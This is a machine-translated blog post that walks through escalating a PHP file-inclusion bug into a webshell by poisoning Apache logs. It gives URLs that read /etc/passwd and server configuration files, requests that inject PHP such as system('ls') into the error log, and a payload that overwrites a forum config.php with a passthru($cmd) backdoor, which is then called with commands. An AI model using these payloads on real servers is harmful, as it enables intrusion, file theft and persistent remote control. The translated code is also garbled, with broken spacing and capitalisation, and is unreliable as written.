Thoughts on php including Apache logs

Source: http://2096.blogbus.com/index.html
Author: Zizzy

The use of php including Apache logs is actually recorded by the Apache server log using the submitted address, and the corresponding php statements are submitted in the log to include the de-execution. However, the biggest drawback of this method is that Apache logs will be too large, and the response will certainly time out or something, so it is also restricted by the conditions. This is a kind of research.
For example, if a php vulnerability exists, a php vulnerability contains a statement.

<? Include ($ zizzy);?>

You can
Http://xxx.com/z.php? Zizzy =/etc/inetd. conf
Http://xxx.com/z.php? Zizzy =/proc/cpuinfo
Http://xxx.com/z.php? Zizzy =/etc/passwd

You can use the include statement to view some system environments and password files.

Let's take a look at the log content below:
For example, the location of our Apache server configuration file is here
/Usr/local/apache/conf/httpd. conf
So let's include httpd. conf to see the path information.
Http://xxx.com/z.php? Zizzy =/usr/local/apache/conf/httpd. conf

Read Apache configuration information
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot/home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog/home/virtual/www.xxx.com/logs/www-error_log
CustomLog/home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias/cgi-bin // home/virtual/www.xxx.com/cgi-bin/
Alias/icons // home/virtual/www.xxx.com/icons
</VirtualHost>

While we submit http://xxx.com/z.php? Zizzy =/home/virtual/www.xxx.com/logs/www-error_log
You can read the Apache error log.

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
Exist:/home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
Exist:/home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
Exist:/home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
Directory as script:/home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
Directory as script:/home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
Directory as script:/home/virtual/www.xxx.com/kkkkkkk

Data logs/home/virtual/logs.

For example, we submit
Http://www.xxx.com/<? Phpinfo ();?>
This will certainly cause errors, and the errors will be recorded in the log.
Http://xxx.com/z.php? Zizzy =/home/virtual/www.xxx.com/logs/www-error_log
In this way, the log file contains the phpinfo information.
If you can, this is also good. <? System ("ls +-la +/home");?>

Divergent thinking:
The next step is how to write a webshell to use it.
Of course, the premise is that the permission must be writable. You must-rwxrwxrwx (777) to continue. Here you can view the permission directly using the directory listed above.
For example, this php statement
<? = Str_replace ("? ","! ", Passthru ($ cmd);?>

You may have come up with this. This is a good solution. Next, let's look at how to write data. In this case,
Open the/home/virtual/www.xxx.com/forum/config.php file in fopen, and then write the file <? = Str_replace ("? ","! ", Passthru ($ cmd);?> The statement used to execute the command. The connection is

<? $ Fp = fopen ("/home/virtual/www.xxx.com/forum/config.php", "w +"); fputs ($ fp, "<? = Str_replace ("? ","! ", Passthru ($ cmd);?> "); Fclose ($ fp);?>

We submit this sentence, and then let Apache record it into the log.

Http://xxx.com/z.php? Zizzy = <? $ Fp = fopen ("/home/virtual/www.xxx.com/forum/config.php", "w +"); fputs ($ fp, "<? = Str_replace ("? ","! ", Passthru ($ cmd);?> "); Fclose ($ fp);?>

Some oblique bars are added to the statement for magic_quotes_gpc, so a php Trojan statement is written in config. php.
Submit again
Http://xxx.com/z.php? Zizzy =/home/virtual/www.xxx.com/logs/www-error_log

In this way, the webshell is successfully written.
OK.
Http://www.xxx.com/forum/config.php is our webshell.
You can http://www.xxx.com/forum/config.php? Cmd = ls.